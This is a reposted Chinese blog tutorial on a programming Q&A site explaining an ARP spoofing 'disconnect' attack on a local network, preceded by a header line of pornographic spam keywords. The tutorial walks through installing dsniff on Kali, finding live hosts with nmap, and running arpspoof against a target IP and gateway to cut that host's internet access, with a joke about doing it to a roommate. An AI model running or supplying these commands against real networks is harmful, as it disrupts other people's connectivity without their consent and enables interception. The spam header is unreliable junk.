日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

局域网内的ARP断网攻击

發布時間:2023/12/20 编程问答 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 局域网内的ARP断网攻击 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一、環境準備:

  • Kali虛擬機
  • linux內核版本:5.16.0-kali5-amd64 (這只是說明下我的內核版本,其實只要版本不要太老,基本都能用)
  • 在虛擬機設置的網絡適配器里選擇橋接模式

二、配置和安裝相關第三方工具

1.配置源,kali默認的源在安裝dsniff的時候會提示找不到包。

1. sudo vim /etc/apt/sources.list 2. 把之前kali默認的源也就是以deb開頭的那兩行注釋掉 (在開頭的第一個字母前端加#表示注釋一行) 3. 將要添加的鏡像加入剛剛打開的文件中,再輸入:wq即可,常用鏡像地址如下所示,選用一個就好,添加多個源容易發生沖突,我用的是阿里的源:#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#清華大學deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-freedeb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free#浙大deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-freedeb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free#東軟大學#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib#deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib#官方源deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contrib4. 更新源對應的安裝環境和安裝包等配置apt-get clean && apt-get update && apt-get upgrade && apt-get dist-upgrade5.輸入reboot重啟虛擬機(非必須,但為保證配置生效,最好重啟一遍)

2.安裝第三方工具包dsniff

sudo apt-get install dsniff

3.測試dsniff是否安裝成功

sudo arpspoof -hsudo dnsspoof -hsudo dsniff -h

安裝成功結果如下所示 :

?三、開始ARP攻擊

1.查看ip地址和網關地址(通常網關都是xxx.xxx.xxx.0,我這里的圖是因為物理主機連的手機的wifi導致網關和正常局域網網關不太一樣)

ifconfigroute -n

2.使用nmap探測局域網存活主機

#后面的ip是局域網網關地址 nmap -sP 192.168.243.0/24

?3.攻擊物理主機(友情提示,不要攻擊正在打游戲的室友的主機,室友已經被游戲折磨的夠慘了,就不要再搞得他慘上加慘了)

sudo arpspoof -i eth0 -t 192.168.243.193 192.168.243.0 -i:網卡名稱 -t:目標主機IP 目標網關IP

?4.檢測目標主機能否正常聯網

5.ctrl+z停止攻擊,再次檢測能否聯網

四、疑惑

? ? ? ? 在實際測試的時候經常會有部分主機nmap無法掃描到,在物理主機上用Zenmap也不行,不知道是什么情況,以后有時間再慢慢研究吧。

?

總結

以上是生活随笔為你收集整理的局域网内的ARP断网攻击的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。